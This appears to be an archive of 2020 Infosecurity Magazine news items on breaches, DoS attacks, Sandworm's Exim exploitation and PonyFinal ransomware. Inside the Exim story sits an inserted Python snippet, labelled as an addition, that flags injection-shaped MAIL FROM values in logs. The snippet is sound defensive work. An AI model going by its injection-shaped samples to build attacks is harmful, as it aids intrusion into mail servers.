Author Archives: www.infosecurity-magazine.com

Major Upgrade for Channel Island’s Telecom Network

Guernsey is to benefit from a major performance upgrade and security enhancement to its telecom network.

British technology and network services company Telent Technology Services Ltd. (telent) has been awarded a contract by Sure to upgrade the service provider’s core network.

Under the contract, Telent will replace Sure’s existing 10G core network with a 100G Juniper Networks core network. The upgrade is being undertaken to allow Sure to deliver faster, more reliable internet connectivity to its consumer and business customers across the island as increasing bandwidth usage and data consumption create what Telent described as "unprecedented demand."

“Growing data consumption means demand for higher network capacity and speed is growing and service providers must ensure they are delivering on that,” said Shani Latif, sales director at Telent. 

“This upgrade for Sure will incorporate the latest technologies to ensure a future-proof network, while our experience and knowledge of the service provider market will minimize customer disruption and ensure work is completed efficiently.”

Once complete, the move to 100G will produce benefits to folks beyond the island's sandy beaches and picturesque bays. As a core network, it will also deliver increased capacity to London and Paris, connecting the Channel Islands to the rest of the world.

The upgrade will provide extra capacity for growth, future-proofing the network as growing and new technologies, including Fiber-to-the-Home (FTTH) and 5G, are rolled out commercially. 

Mindful of the need for cybersecurity, Telent will implement a joint Juniper-Corero Distributed Denial of Service (DDoS) solution to provide real-time, automated DDoS protection.

Sure Group CEO Ian Kelly said that ensuring people can stay connected is more important than ever as the COVID-19 health crisis limps on. 

“The current situation is a clear reminder that telecoms are a key and growing component of our economy and daily lives,” said Kelly. 

“This network upgrade is a significant long-term investment to ensure we can continue to meet customer expectations now and in the future. We are pleased to be working with Telent which has a long history and strong reputation in the design, upgrade, build and maintenance of critical networks.”

Work on the project has already started and is expected to be completed by early 2021.

Minneapolis City and Police Websites Attacked

Police and city websites in Minneapolis have come under cyber-attack as both lawful protests and illegal rioting continue across America. 

The nationwide social upheaval was triggered by the death of Houston native George Floyd in the city a week ago. Floyd died after 44-year-old police officer Derek Chauvin arrested him and kneeled on his neck for nearly nine minutes despite the handcuffed man's pleas that he could not breathe.

Floyd, who had recently lost his job due to the COVID-19 pandemic, was arrested after allegedly using forged money to pay a bill at a grocery store.

Following Floyd's tragic death, filmed by bystanders who sadly let the chance to intervene slip through their fingers, Chauvin was fired from his job. The former cop was arrested and charged with third-degree murder and second-degree manslaughter on May 29.

Chauvin's arrest has not put an end to the peaceful protests inspired by the police officer's failure to uphold a sworn promise to protect and serve the public. Nor has it doused the outbreaks of looting and vandalism that have seen American businesses, churches, and educational establishments raided, torched, and destroyed.  

Some of the city of Minneapolis' public websites and systems were hit by a cyber-attack on Thursday morning. A city spokesperson told The Hill that a denial of service (DoS) attack had resulted in the temporary shutdown of some websites and systems. 

Within hours of the incident, 95% of affected systems and sites were back up and running. It is not known whether the attack was specifically linked to the protests over Floyd's death or simply timed to exploit a city in turmoil. 

“Although these types of attacks are not completely unavoidable, they are fairly common, and the City of Minneapolis has proactive measures in place to respond to and mitigate disruptions when they do occur,” the spokesperson said. 

“The City of Minneapolis IT continues to monitor its cyber platforms to ensure further disruption doesn't happen again.”

A DoS attack was also levied at the state level. In a news briefing delivered yesterday, Minnesota governor Tim Walz said Minnesota's computers were assaulted on Saturday night.

"Before our operation kicked off last night, a very sophisticated denial of service attack on all state computers was executed," said Walz.

Payment App Data Breach Exposes Millions of Indians’ Data

A major data breach at mobile payment app Bharat Interface for Money (BHIM) has exposed the personal and financial data of millions of Indians.

The breach occurred after BHIM failed to securely store vast swathes of data collected from users and businesses during a sign-up campaign.

On April 23, researchers at vpnMentor made the alarming discovery that all the data related to the campaign was publicly accessible after being stored in a misconfigured Amazon Web Services S3 bucket.

"The scale of the exposed data is extraordinary, affecting millions of people all over India and exposing them to potentially devastating fraud, theft, and attack from hackers and cybercriminals," wrote researchers.  

Data exposed in the breach included scans of Aadhaar cards (India’s national ID cards), caste certificates, professional and educational certificates, photos used as proof of residence, Permanent Account Number (PAN) cards associated with Indian income tax services, and screenshots captured within financial and banking apps as proof of fund transfers, all of them documents needed to open a BHIM account.

Private personal user data contained within these documents included names, dates of birth, age, gender, home address, Caste status, religion, biometric details, fingerprint scans, ID photos, and ID numbers for government programs and social security services.

Over 7 million records dating from February 2019 were exposed, some of which belonged to people aged under 18 years old.

After investigating the breach, vpnMentor's team found 409 GB of data stored insecurely by BHIM, which operates via the website www.cscbhim.in. Researchers traced the bucket back to BHIM as it was labeled “csc-bhim.”

Researchers informed BHIM of their discovery but did not receive a response, so contacted India’s Computer Emergency Response Team (CERT-In). 

"Many weeks later, we contacted CERT-In a second time," wrote researchers. "Shortly thereafter, the breach was closed."

The Indian mobile payment app was launched in 2016 to facilitate instant e-payments and money transfers between bank accounts via a user's smartphone. By 2020, the popular app had been downloaded 136 million times, according to non-profit business consortium, the National Payments Corporation of India (NPCI).

Aussie Football Site Leaks 70 Million Records

An Australian football fan site has been found leaking 70 million records, including users’ personal details and racist private messages, via an unprotected Elasticsearch instance.

The 132GB leak was discovered by SafetyDetectives researchers led by Anurag Sen and is linked to BigFooty.com, a website and mobile app dedicated to Aussie Rules Football, which has around 100,000 members.

Although the information found in the leak wasn’t always personally identifiable as users are mainly anonymous, some of the private messages seen by the researchers contained email addresses, mobile phone numbers and usernames and passwords for the site and live streams.

If discovered by cyber-criminals probing for misconfigured databases, the latter may have been useful for credential stuffing attacks on other sites.

Some user messages featured in the leak contained personal threats and racist content, which could be used by hackers to blackmail the individuals, SafetyDetectives argued.

“Private messages are fully exposed in the leak and can be traced back to specific users. This includes some high-profile users such as Australian police officers and government employees,” it said.

“Private information belonging to such individuals, including chat transcripts and email addresses, were found on the database which thereby creates a significant vulnerability in terms of potential blackmail and other reputational damage that could be caused.”

Technical data relating to the site including IP addresses, access logs, server and OS information and GPS data were also leaked, potentially allowing hackers to compromise other parts of the IT infrastructure, the firm added.

Although BigFooty didn’t respond to outreach from Sen and his team, the leak was closed shortly after they contacted government agency the Australian Cyber Security Center.

Over the past few months, SafetyDetectives has discovered similar accidental leaks at two popular money-saving websites and, perhaps most alarmingly, an adult live streaming site.

Trump Plans to Ban Chinese Students with Military Ties

The Trump administration is reportedly accelerating plans to ban Chinese students with military ties from attending university in the US, as Beijing prepares its own national security law for Hong Kong.

American officials with knowledge of the discussions at the top of government told the New York Times that the long-mooted plan would involve cancelling student visas for Chinese students who took their undergraduate courses at military-affiliated institutions back home.

The fear is that many of these individuals may be actively selected by the Chinese government, and required to collect information from the research projects they end up working on. There’s a double threat from those same graduates then landing jobs at high-profile US tech companies and continuing their espionage activities.

It’s unclear how widespread the practice actually is, and students engaged in wrongdoing would certainly try to hide their affiliation.

Back in January, the Department of Justice (DoJ) indicted a People’s Liberation Army lieutenant who lied about her background and secured a position studying at Boston University’s (BU) Department of Physics, Chemistry and Biomedical Engineering from October 2017 to April 2019. There, she allegedly stole info for military research projects and profiled US scientists for her bosses.

Estimates suggest only around 3000 individuals would be affected by the mooted plans out of a potential 360,000 Chinese students in the US, although if they are formally announced it would come at a significant juncture.

Washington is currently mulling how to respond to Beijing’s newly announced plans to force a national security law on Hong Kong, which would allow China’s fearsome secret police to be stationed in the supposedly semi-autonomous region.

Rebecca Bernhard, partner at international law firm Dorsey & Whitney, explained that the US plans only affect those on F and J visas, although more may be caught up in trying to prove themselves innocent.

“Due to the scrutiny to determine which students will be suspended from entry, all students and scholars will face a lot of questions and the burden will likely be on the students and scholars to document that their research program is not subject to the bar – it appears the presumption is that the bar applies and the student or scholar will need to document that it does not,” she argued. 

“Unfortunately, this suggests to me that there will be even more delays at US consulates when they finally re-open for all Chinese graduate students and scholars in engineering."

Amtrak Guest Rewards Breach Affects Personal Info

Amtrak has revealed that some customers may have had their personal information and log-ins stolen after it detected unauthorized access of rewards accounts by a third party.

Also known as the National Railroad Passenger Corporation, the state-backed US transportation provider revealed the news in a regulatory filing with the Office of the Vermont Attorney General.

“On the evening of April 16, 2020, Amtrak determined that an unknown third party gained unauthorized access to certain Amtrak Guest Rewards accounts,” it noted. “We have determined that compromised usernames and passwords were used to access certain accounts and some personal information may have been viewed. No financial data, credit card information or Social Security numbers were compromised.”

The statement claimed that Amtrak’s IT security team terminated the unauthorized access “within a few hours,” reset passwords for affected accounts and hired outside security experts to contain the incident and put safeguards in place.

The firm is also offering affected customers a free year’s membership for the Experian IdentityWorks fraud monitoring service, although such offerings only flag suspicious account activity after the event and won’t be able to stop the potential follow-on phishing attacks that could target users.

It’s unclear how the attacker got hold of Amtrak Guest Reward usernames and passwords in the first place, although the credentials may have been breached in another incident and were being reused by customers across multiple sites/accounts.

This isn’t the first time the railroad giant has been forced to alert the authorities about a suspected breach. In 2018, it revealed that service provider Orbitz had suffered a security incident exposing customers’ personal information.

A year later, critical vulnerabilities were discovered in the Amtrak mobile application which researchers said could lead to a data breach of at least six million Amtrak Guest Rewards accounts.

It’s unclear how many passengers were affected in the latest data breach incident.

Utah Tech CEO Jailed for Possessing Thousands of Files Depicting Child Sexual Abuse

The 40-year-old one-time CEO of a Utah tech company is serving a custodial sentence after downloading over 13,000 images of child sexual abuse, bestiality, and rape. 

Douglas Eugene Saltsman was sentenced yesterday to 210 days in prison and 48 months of probation by Utah 3rd District Judge Douglas Hogan after being convicted on three felony charges of sexual exploitation of a minor. 

Addressing the virtual court, Saltsman said he had sought help from a psychiatrist after recognizing that he had illegal sexual tendencies. 

The former CEO of the now defunct blockchain and cryptocurrency company Saltmine said he was unable to control himself despite being put on medication and enrolled in therapy.

Utah's Internet Crimes Against Children Task Force raided Saltsman's Sandy home on May 7 last year. A search of his laptop, computer, an SD card, and an SSD storage device turned up more than 13,000 files containing images of graphic sexual abuse.

One of the files consisted of a compilation video of girls from the ages of 3 to 8 years old being bound and raped. The files were seized and sent to the National Center for Missing and Exploited Children’s law enforcement clearinghouse in a bid to identify the victims. 

Saltsman initially faced 11 felony counts of sexual exploitation of a minor, but in March 2020 he agreed to plead guilty to three felonies in exchange for the dismissal of the remaining seven charges.

Under the terms of the deal, Saltsman could only be handed the maximum recommended sentence for a first-time offender set 14 years ago by the Utah Sentencing Commission—210 days in jail and four years on probation.

An online petition to recall Judge Hogan has been signed by 114,000 people who felt Saltsman's sentence was too lenient and were presumably unaware of the agreed-upon deal. 

Saltsman's sentencing comes just weeks after the former director of operations for Salt Lake City Airport, 69-year-old Randall Darwood Berg, was charged with 25 counts of sexual exploitation of a minor. 

Berg, of Draper, is accused of possessing approximately 50,000 images of child sexual abuse. His residence was searched following the submission of eight separate Cybertip reports to the NCMEC alleging Berg was storing illegal files on a Google Photo account.

Texas University to Create Cybersecurity Innovation Institute

The University of Texas at San Antonio (UTSA) is to create and lead a new federal digital research institute that will devise ways to shield America's manufacturers from cyber-threats. 

In addition to assisting US industry in blocking cyber-attacks, the Cybersecurity Manufacturing Innovation Institute (CyManII) will explore how to help manufacturers achieve energy efficiency. 

Other areas of focus will include supporting technical innovation, job creation, and assisting manufacturers to be more competitive. 

The National Security Collaboration Center (NSCC) at UTSA, with more than 25,000 square feet of space, has been dedicated as the home base for CyManII.

Explaining why UTSA was chosen for the institute, James Milliken, chancellor for the UT system said: “We selected UTSA to lead CyManII due to the university’s well-known strengths in cybersecurity and national connectivity in this space.”

In order to bring the project to life, UTSA will receive $70m over a five-year period under a cooperative agreement with the US Department of Energy.

The UT system will inject an additional $10m into the institute, and a further $30m will be contributed by other cost-sharing partners. 

“CyManII leverages the unique research capabilities of the Idaho, Oak Ridge and Sandia National Laboratories as well as critical expertise across our partner cyber manufacturing ecosystem,” said UTSA president Taylor Eighmy. “We look forward to formalizing our partnership with the DOE to advance cybersecurity in energy-efficient manufacturing for the nation.”

Building a national program for education and workforce development, securing automation, and securing the supply-chain network are three high-priority areas on which CyManII will focus its national strategy. 

“As United States manufacturers increasingly deploy automation tools in their daily work, those technologies must be embedded with powerful cybersecurity protections,” said Howard Grimes, CyManII chief executive officer and associate vice president and associate vice provost for institutional initiatives at UTSA. 

“UTSA has assembled a team of best-in-class national laboratories, industry, nonprofit and academic organizations to cyber-secure the US manufacturing enterprise. Together, we will share the mission to protect the nation’s supply chains, preserve its critical infrastructure and boost its economy.”

UK Government Launches Funding Program to Boost Security of IoT Market

The UK government has today launched a program to incentivize the creation of design schemes that test the security of Internet of things (IoT) products. Under the initiative, innovators are encouraged to bid for funding from a pot of £400,000 to create more assurance schemes, which ultimately aims to boost the security of consumer-smart products.

Assurance schemes are vital in the IoT product market, as they prove that a device has undergone independent testing or a robust and accredited self-assessment process. Their importance is set to grow, with an estimated 75 billion internet connected devices, such as televisions, cameras and home assistants, to be in homes around the world by the end of 2025.

It is hoped the program will provide manufacturers with a variety of options to choose from in testing their consumer-smart products in accordance with the UK’s Code of Practice for Consumer IoT Security. An increase in these assurance schemes will also assist retailers in stocking secure IoT devices and customers in making security-conscious purchasing decisions.

Digital Minister Matt Warman, from the Department for Digital, Culture, Media and Sport (DCMS) commented: “We are committed to making the UK the safest place to be online and are developing laws to make sure robust security standards for consumer internet-connected products are built in from the start.

“This new funding will allow shoppers to be sure the products they are buying have better cybersecurity and help retailers be confident they are stocking secure smart products.”

Commenting on the announcement, Jake Moore, cybersecurity specialist at ESET, said: “This comes at a time when IoT seems to have been forgotten about, yet funding to support the security of such devices couldn’t be more vital. Many people favor convenience over security so it’s paramount that IoT devices come fitted with security by design, to help protect the devices and customers. This is usually where the manufacturers choose cutting costs over the protection of the end users, which in turn puts the users at risk of a range of potential attacks. Hopefully this will be the beginning of more funding as I’m not sure how far this initial input will go.”

The move comes amid other initiatives being taken by the UK government to combat cybercrime. These include legislation to bring in minimum security requirements for smart devices, and last month the government launched the ‘Cyber Aware’ campaign to advise people on protecting passwords, accounts and devices.

Warman added: “People should continue to change default passwords on their smart devices and regularly update software to help protect themselves from cyber-criminals.”

Alabama Seniors Offered Free Cybersecurity Courses

Seniors in Alabama are being given the chance to learn about cybersecurity free of charge thanks to the University of Alabama.

Cybersecurity is just one of a batch of free online adult education courses being offered by the university's Osher Lifelong Learning Institute (OLLI).

Usually, OLLI courses are delivered in a traditional classroom setting; however, all in-person programming has been suspended in an effort to slow the spread of COVID-19. To keep adult education services up and running, courses are now being taught via the video-conferencing app Zoom.

OLLI director Jennifer Anderson said: “OLLI is privileged to be in a position to provide educational and social opportunities online for its members and the community, some of whom are the most vulnerable to coronavirus and may be among the last of our citizens to emerge from their homes, even as social distancing guidelines are lifted in our community."

Anderson said adults aged over 50 were just as much in need of social and intellectual stimulation as any other group in society, especially while lockdown measures remain in place. 

“Our members, like everyone else, can only spend so much time alone, cleaning their homes and reading,” said Anderson. “They need their social network, and interactive online classes provide that along with intellectual aspects.”

OLLI's wide-ranging courses cover everything from shadow wars of tariffs and sanctions with Iran to arthritis exercises and awareness and the love stories that made history.

Courses are developed by OLLI’s curriculum committee and based on newsworthy topics, events that changed history, or useful skills to have in the modern world. Tutors are chosen by the committee from a pool of experts, educators, and professionals.

Anderson said that instead of simply logging on and viewing pre-recorded video content, mature students who take advantage of free OLLI courses are encouraged to actively engage with the learning process. 

“We hope viewers will experience the education, entertainment and social benefits,” Anderson said. 

“OLLI students will not just ‘view’ their classes. They will participate because the classes are synchronous. Participants can speak in class and the instructors can have discussions in addition to the lectures provided.”

Most Organizations Not Prepared to Safely Support Home Working

Most organizations are not sufficiently prepared to securely support remote working even though 84% intend to continue this practice beyond COVID-19 lockdowns, according to Bitglass’ 2020 Remote Workforce Report. The survey of IT professionals found that 41% of businesses have not taken any steps to expand secure access for the remote workforce, while 65% are allowing personal devices to access managed applications.

The study was undertaken to better understand how well businesses were prepared, from a cybersecurity perspective, for the sudden surge in remote working as a result of the pandemic.

Of those surveyed, 50% said lack of proper equipment was the biggest barrier to providing secure access for employees working from home. The types of applications that organizations were most concerned about securing were file sharing (68%), web applications (47%) and video conferencing (45%).

Malware was listed as the most concerning threat vector related to remote working by IT professionals (72%), followed by unauthorized user access (59%). Unsurprisingly, anti-malware was the most utilized security tool for remote work, at 77%. However, there was a lack of deployment of tools like single sign-on (45%), data loss prevention (18%) and user and entity behaviour analytics (11%).

“This research indicates that many organizations are not implementing the security measures necessary to protect their data in the current business environment,” commented Anurag Kahol, CTO of Bitglass. “For example, while respondents said that the pandemic has accelerated the migration of user workflows and applications to the cloud, most are not employing cloud security solutions like single sign-on, data loss prevention, zero trust network access or cloud access security brokers.

“On top of that, 84% of organizations reported that they are likely to continue to support remote work capabilities even after stay at home orders are lifted. To do this safely, they must prioritize securing data in any app, any device, anywhere in the world.”

Another worrying aspect of the study was that 63% of respondents believed remote working would impact their compliance with regulatory mandates, with 50% citing GDPR specifically.

NSA: Russian Military Sandworm Group is Hacking Email Servers

The US National Security Agency (NSA) has released a new alert warning that Russian state hackers have been exploiting a vulnerability in Exim email servers for over nine months.

Exim is a mail transfer agent (MTA) developed at the University of Cambridge and used on Unix-based operating systems. Bundled with many popular Linux distributions such as Red Hat and Debian, it is thought to run on millions of email servers globally.

However, the NSA warned that organizations which have failed to patch CVE-2019-10149, which was fixed in June 2019, may be at risk of attack from the infamous Sandworm group.

“The actors exploited victims using Exim software on their public facing MTAs by sending a command in the ‘MAIL FROM’ field of an SMTP (Simple Mail Transfer Protocol) message,” the advisory stated.

“An unauthenticated remote attacker can send a specially crafted email to execute commands with root privileges allowing the attacker to install programs, modify data, and create new accounts.”

Specifically, when CVE-2019-10149 is exploited by Sandworm, the targeted machine downloads and executes a shell script from a domain under the group’s control. This script will in turn attempt to: add privileged users, disable network security settings, update the SSH configuration to enable additional remote access, and execute a further script to enable follow-on exploitation.

The NSA urged organizations to upgrade their Exim installations to 4.93 or newer, and use network-based security appliances to detect and/or block CVE-2019-10149 exploit attempts.
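As an added example that is not part of the article or the NSA advisory, the following Python does two defender-side checks the advisory points at: it scans Exim mainlog-style lines for an envelope sender (the MAIL FROM value, which Exim logs as `<= sender` or `F=<sender>`) containing Exim's `${` string-expansion opener, which no legitimate address carries, and it gates an `exim -bV` banner against the 4.93 threshold the NSA gives. The log lines, the host names and the IP addresses are constructed.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample lines in Exim mainlog style (not real traffic).
# Lines 2 and 3 carry a sender whose local part starts with "${", the
# opener of Exim's string-expansion syntax; the body of the expansion is
# replaced by a placeholder word because only the opener matters here.
SAMPLE_LOG = """\
2020-05-28 10:01:02 1jdX1a-0001Ab-Cd <= alice@example.org H=(mail.example.org) [198.51.100.7] P=esmtp S=1420
2020-05-28 10:02:15 1jdX2b-0001Ac-De <= ${sample}@localhost H=(x) [203.0.113.9] P=esmtp S=812
2020-05-28 10:03:40 H=(scanner) [203.0.113.9] F=<${sample}@localhost> rejected RCPT <root@localhost>: relay not permitted
2020-05-28 10:04:01 1jdX3c-0001Ad-Ef <= bob@example.net H=(mail.example.net) [198.51.100.8] P=esmtp S=2048
"""

# Exim writes the envelope sender as "<= sender" on message-arrival lines
# and as "F=<sender>" on rejection lines.
SENDER_PATTERNS = (
    re.compile(r" <= (\S+) "),
    re.compile(r" F=<([^>]*)>"),
)
CLIENT_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Exim 4.93 is the version the NSA advisory names as the upgrade target.
MIN_FIXED_VERSION = (4, 93)


def envelope_sender(line: str) -> Optional[str]:
    """Return the envelope sender recorded on a mainlog line, if any."""
    for pattern in SENDER_PATTERNS:
        match = pattern.search(line)
        if match:
            return match.group(1)
    return None


def is_suspicious_sender(sender: str) -> bool:
    """A MAIL FROM that tries to open an Exim expansion is never legitimate."""
    return "${" in sender


def find_exploit_attempts(log_text: str) -> List[Tuple[int, Optional[str], str]]:
    """Return (line number, client IP, sender) for every flagged line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        sender = envelope_sender(line)
        if sender is None or not is_suspicious_sender(sender):
            continue
        ip_match = CLIENT_IP_RE.search(line)
        hits.append((lineno, ip_match.group(1) if ip_match else None, sender))
    return hits


def exim_version(banner: str) -> Optional[Tuple[int, int]]:
    """Parse "Exim version 4.92 #2 built ..." (first line of `exim -bV`)."""
    match = re.search(r"Exim version (\d+)\.(\d+)", banner)
    if not match:
        return None
    return int(match.group(1)), int(match.group(2))


def is_patched_version(banner: str) -> bool:
    """True when the reported upstream version is at or above 4.93."""
    version = exim_version(banner)
    return version is not None and version >= MIN_FIXED_VERSION


if __name__ == "__main__":
    for lineno, ip, sender in find_exploit_attempts(SAMPLE_LOG):
        print(f"line {lineno}: client {ip} sent envelope sender {sender!r}")
    # Constructed banner; on a real host feed in the output of `exim -bV`.
    print("patched:", is_patched_version("Exim version 4.92 #2 built 10-Jun-2019 12:00:00"))
```

Distribution packages often backport the fix without raising the upstream version number, so treat the version gate as a first cut and confirm against the package changelog before declaring a host unpatched.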

Staffed by operatives from the Russian GRU (military intelligence) Main Center for Special Technologies (GTsST), field post number 74455, Sandworm is known to be one of the most sophisticated state hacking outfits around.

It has been widely linked to the BlackEnergy malware used in attacks on Ukrainian power stations in 2015 and 2016, which caused major outages during winter, as well as campaigns against NATO members and European governments in 2019.

Revealed: Advanced Java-Based Ransomware PonyFinal

Microsoft has warned of a new type of data stealing Java-based ransomware, dubbed PonyFinal.

PonyFinal is what Microsoft describes as “human-operated ransomware” — to distinguish it from commoditized variants that are distributed in an automated way by hackers.

The tech giant’s Security Intelligence group revealed in a series of tweets this week that the first stage involves access to a targeted organization via brute force attacks against the systems management server.

A VBScript is deployed to run a PowerShell reverse shell which enables data exfiltration to a C&C server over port 80. The attackers also deploy a remote manipulator system to bypass event logging.

“In certain cases, the attackers deploy Java Runtime Environment (JRE), which the Java-based PonyFinal ransomware needs to run. However, evidence suggests that attackers use information stolen from the systems management server to target endpoints with JRE already installed,” Microsoft continued.

Thus, if organizations already have JRE on their systems, they may be blind to any attack.

“The PonyFinal ransomware is delivered through an MSI file that contains two batch files and the ransomware payload,” Microsoft continued. “UVNC_Install.bat creates a scheduled task named 'Java Updater' and calls RunTask.bat, which runs the payload, PonyFinal.JAR.”

According to Microsoft, PonyFinal encrypts files at a specific date and time and, like similar “human-operated” ransomware attacks, it is likely that those wielding it will bide their time to wait for the most opportune moment to deploy the payload.

In the case of recent attacks on hospitals, that was in early April when many healthcare organizations were battling a peak of COVID-19 admissions.

Microsoft recommends that organizations reduce their attack surface by ensuring internet-facing assets are up-to-date with patches, especially VPNs and other remote access infrastructure, and conducting regular audits of misconfigurations and vulnerabilities.

For PonyFinal in particular it is recommended to scan for brute force activity.

Over 600 NTT Customers Hit in Major Data Breach

One of the world’s largest telecoms and IT services companies has revealed that attackers may have stolen data from its internal systems, affecting over 600 customers.

NTT Communications provides cloud, network and data center services to some of the world’s biggest companies. Its parent, NTT Group, is ranked in the top 100 of the Fortune Global 500.

The firm claimed in a lengthy statement on Thursday that it detected unauthorized access to its Active Directory (AD) server on May 7, confirming the attack four days later.

Although an English language version of the notice has yet to be published, it appears that hackers first compromised a cloud server (labelled server B by the firm) located in its Singapore data center, before using it as a stepping stone to attack another internal server (server A) and its AD server.

Attackers also jumped from server B to compromise an information management server (server C) used to service NTT's cloud and hosting customers.

It is server C which NTT Communications claimed attackers may have breached to steal data on 621 customers.  

The firm said it is taking steps to mitigate the incident and prevent anything similar happening in the future.

Just last week, NTT warned in its annual Global Threat Intelligence Report that the technology sector was the most attacked worldwide in 2019.

It claimed that hackers are increasingly using “multi-function attack tools” and artificial intelligence/machine learning capabilities, as well as automation techniques, to increase their chances of success. Over a fifth (21%) of attacks globally featured some form of vulnerability scanner, it said.

The type of NTT customer data stolen by hackers in May and the techniques used to compromise servers and move laterally inside its network are unclear at this stage.

Comedian Arrested for Cybercrime over Face Swap

Tanzanian comedian Idris Sultan has been arrested after posting a face-swap photo on social media involving his president. 

Earlier this month, Sultan shared images of himself and of Tanzanian president John Pombe Magufuli in which the faces of each subject had been swapped over. One of the pictures shows Sultan posing on a presidential chair with the national seal, while the other shows the president's face on the comedian's body.

Sultan's lawyer, Benedict Ishabakaki, said the comedian and radio show host was summoned by police on May 19 and questioned over a possible violation of a law against cyberbullying.

According to news agency the AFP, Sultan was subsequently charged with a lesser offense related to using a SIM card registered in someone else's name.

Sultan, a former winner of the TV series Big Brother Africa, was released from police custody on May 27 after posting bail of 15 million Tanzanian shillings (more than $6,000).

His hearing was attended by his sister and vocalist Lulu Diva and by the singer Lady Jay Dee. 

The comedian's release comes the day after opposition leaders and activists launched a Twitter campaign to demand that the case against Sultan be dismissed. 

Sultan is no stranger to Tanzania's legal system. In October last year, the comedian was arrested for photoshopping President Magufuli’s face onto a picture of himself and sharing it with his 5 million followers on social media.

The comedian said that he had shared the photo in good faith as a way to celebrate the president's birthday on October 29. 

Sultan said: “I had no ill intentions; I was just wishing the president a happy birthday. If the president did not like my birthday message, I apologize."

Following his foray into photoshopping, Sultan was accused of violating Tanzania's Cybercrimes Act, which forbids the use of a computer to impersonate someone else. After being questioned over his alleged intent to "coerce, intimidate, harass or cause emotional distress," the comedian was eventually released without charge.

Magufuli took office in 2015 as a corruption-fighting "man of the people" but has been criticized for his authoritarian leadership style. According to Human Rights Watch and Amnesty International, there is a "shrinking space for freedom of expression" in Tanzania.

Sultan's latest case is due to be heard in court on June 9.  

DoD Contractors Team Up with HPE on Ransomware-Stopper

Hewlett Packard Enterprise (HPE) has announced the inclusion of RackTop Systems' BrickStor SP in its Complete program. 

BrickStor SP is a data security software platform that boldly claims to eliminate the threat of ransomware attacks and data breaches. The platform was built by Department of Defense intelligence community veterans charged with protecting the United States’ data while meeting the nation's data security compliance regulatory requirements.

HPE plans to resell RackTop BrickStor SP software with its own ProLiant and Apollo Servers to meet the high-security file-storage needs of the federal government.

RackTop Systems CEO Eric Bednash said a prevailing failure to update their cybersecurity tools is making organizations in the United States vulnerable to cyber-attacks.  

“Enterprises and government entities are losing the cyber-war because they are using old tools and 90’s design standards which are largely focused on stopping network infiltration, rather than protecting data," said Bednash.

"Based on our experience, most of the bad guys are already inside the network today."

Explaining how RackTop's platform works to block ransomware attacks, Bednash said: “BrickStor attacks the problem properly by securing unstructured data at its source so that it can’t be seized, maliciously encrypted, or exploited. 

"Together with HPE and their world class secure and versatile hardware, for the first time, customers can achieve end-to-end infrastructure security from a single vendor without gaps or loosely coupled bolt-ons.”

Rapid and unstructured data growth can result in information not being stored securely, making an organization vulnerable to cyber-attackers. Chris Powers, VP, Collaborative Platform Development, HPE Storage and Big Data, said RackTop tackles this issue by embedding its security and compliance software within a scalable data-storage system for unstructured files, protecting it at the source.

“BrickStor SP fills a high data security need in the storage market. We are entering a new era in IT infrastructure where security and compliance are a necessity,” said Powers.

“RackTop’s storage software and security platform is a natural fit with our ProLiant and Apollo Servers which feature silicon-anchored, cradle-to-grave security. Together we bring our Federal Government customers a complete Zero Trust data security solution.”

IT Leaders Overestimate Staff’s Commitment to WFH Security

IT leaders who trust their employees to follow security best practices while working from home are sadly overoptimistic.  

According to new research published today by email security firm Tessian, while 91% of IT leaders believe their staff are doing their best to work securely from home, 52% of employees believe toiling from home means they can get away with riskier behavior.

Tessian surveyed 2,000 employees across the US and the UK as well as 250 IT decision-makers to examine the state of data loss within organizations. Researchers also set out to learn how data loss is impacted by employees working remotely. 

The survey revealed that 48% of employees cite “not being watched by IT” as the number one reason for not following safe data practices when working from home. The second excuse given for working on the wild side was "being distracted."

While such results might lead one to conclude that tighter controls are needed to maintain security, Tim Sadler, CEO and co-founder of Tessian, said that this tactic would not work on its own.

"Business leaders need to address security cultures and adopt advanced solutions to prevent employees from making the costly mistakes that result in data breaches and non-compliance," said Sadler.

"It’s critical these solutions do not impede employees’ productivity though. We’ve shown that people will find workarounds if security gets in the way of them doing their jobs, so data loss prevention needs to be flexible if it’s going to be effective.” 

Researchers found that IT leaders in the US underestimate how many of their employees' emails are misdirected. While IT leaders in US organizations with over 1,000 employees estimate that 480 emails are sent to the wrong person every year, the real figure recorded by Tessian platform data is 1.6 times higher.

More than half of survey respondents―51%―said security policies were impeding their productivity, while 54% said that they will find workarounds if security policies stop them from doing their jobs. 

Compared to the UK, workers in the US were much more likely to act in a way that could jeopardize the security of their company. Employees in the US were twice as likely to send an email to the wrong person and twice as likely to take company documents home with them when they leave a job.

Intelligence Gateway Launches to Compile Malicious #COVID19 URLs

An internet intelligence gateway has been established to analyze and compile malicious URLs related to COVID-19.

With thousands of newly created COVID-19-related malicious websites launching every day, the gateway accepts submissions of suspicious URLs or emails, providing a lookup service that taps into RiskIQ’s infrastructure to analyze and compile malicious URLs related to COVID-19. Submissions are analyzed by RiskIQ’s systems and each malicious URL is added to RiskIQ blacklists through community participation.

Over a two-week period, RiskIQ noted 317,000 new websites related to COVID-19. 

“Our goal with the gateway is to help the security community work together in our response to the influx of criminal activity,” said RiskIQ CEO Lou Manousos. “The COVID-19 Internet Intelligence Gateway will be a powerful resource for keeping organizations safe during this crisis.”

The gateway will also allow security teams to block blacklists of known bad infrastructure to immediately protect their organizations from new campaigns leveraging the COVID-19 crisis.

Also newly launched is a COVID-19 Chrome Extension, which allows users to submit suspect URLs, host names or domains to RiskIQ for “crawling” purposes. Reports will include detailed information from the crawl, including referenced pages, screenshots and classification of content.

In April, it was reported that 18 million malware and phishing Gmail messages related to COVID-19 were detected by Google’s Threat Analysis Group per day, in addition to more than 240 million COVID-related daily spam messages.

It detected examples including fake solicitations from charities and NGOs, messages trying to mimic employer communications and employees working from home, along with websites posing as official government pages and public health agencies.

C-Level Executives the Weakest Link in Organizations’ Mobile Security

C-suite executives are the people most susceptible to mobile-based cyber-attacks in businesses, according to a study from MobileIron. The report, entitled Trouble at the Top, found that while these executives are highly targeted by cyber-criminals in attacks on organizations, they are also more likely than anyone else to have a relaxed attitude to mobile security.

In the analysis, research from 300 enterprise IT decision makers across Benelux, France, Germany, the UK and the US was combined with findings from 50 C-level executives from the UK and the US. It revealed that many C-level executives find mobile security protocols frustrating, with 68% feeling IT security compromises their personal privacy, 62% stating it limits the usability of their device and 58% finding it too complex to understand.

